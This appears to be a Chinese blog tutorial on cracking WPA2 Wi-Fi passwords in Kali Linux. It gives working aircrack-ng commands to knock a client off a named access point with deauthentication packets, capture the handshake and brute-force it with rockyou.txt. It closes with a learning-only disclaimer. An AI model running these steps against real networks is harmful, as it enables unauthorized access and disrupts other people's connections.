kali破解Wi-Fi密码

kali系统接入无线网卡,通过监听周围热点,选择一个Wi-Fi热点,攻击一台连接了该Wi-Fi热点的设备,使它掉线之后这台设备会再次主动连接,用伪装的挂载设备去接受设备发送的tcp三次握手数据包。只要用kali自带的密码字典文件去穷举该数据包,直到找到Wi-Fi密码为止就成功了
在这里插入图片描述
先将无线网卡插入Kali Linux,输入命令查看,网卡名一般为wlan0:
iwconfig
在这里插入图片描述
输入以下命令将可能会影响进行无线实验的因素排除掉:
service network-manager stop
airmon-ng check kill

在这里插入图片描述
接着启动monitor模式开启网卡监听:
在这里插入图片描述
输入iwconfig命令确认已经进入monitor模式:
在这里插入图片描述
扫描wifi信号,数据包抓取
airodump-ng wlan0mon:
在这里插入图片描述

  • PWR:信号强度,数字越⼩小越好
  • Data:对应路由器的在线数据吞吐量,数字越⼤数据上传量越⼤
  • CH:对应路由器所在频道
  • ESSID:对应路由器名称

选择一个WiFi(在此我选择MAC为70:47:E9:64:9A:CF,路由器名为“嘿嘿嘿”)针对某一个WiFi的BSSID进行抓取
airodump-ng -c <AP的频道> -w <抓取握⼿手包的存放位置> --bssid <AP的MAC地址> < monitor名称>
airodump-ng wlan0mon --bssid 70:47:E9:64:9A:CF -c 11 -w wpa2
抓取 ssid 为70:47:E9:64:9A:CF信道为11的wpa2的数据包
在这里插入图片描述
现在还抓不到握手包,因为没有客户端与AP进行连接
但是有一个已连接的热点,我们通过新开一个终端窗口,解除认证发送反认证包,让它下线,然后客户端会重新尝试连接热点
aireplay-ng -0 <发送反认证包的个数> -a -c <强制下线的MAC地址> 无线网卡名称
aireplay-ng -0 10 -a 70:47:E9:64:9A:CF -c 34:F6:4B:AC:E6:F8 wlan0mon

在这里插入图片描述
系统会下线重新连接,我们就抓到了握手包,我们返回第一个终端就可以看到已经抓到握手包WPA handshake

在这里插入图片描述
选择需要破解的数据包和字典(kali自带一个字典文件,虽然不大,也可以通过其他的字典生成工具生成)
解压kali自带的字典文件
路径:/usr/share/wordlists/rockyou.txt.gz
gzip -d/usr/share/wordlists/rockyou.txt.gz

在这里插入图片描述
开始爆破
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa2-10.cap

在这里插入图片描述
破解成功
在这里插入图片描述
此文章仅用于学习,不可用于非法途径!

  • 6
    点赞
  • 61
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lmn_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值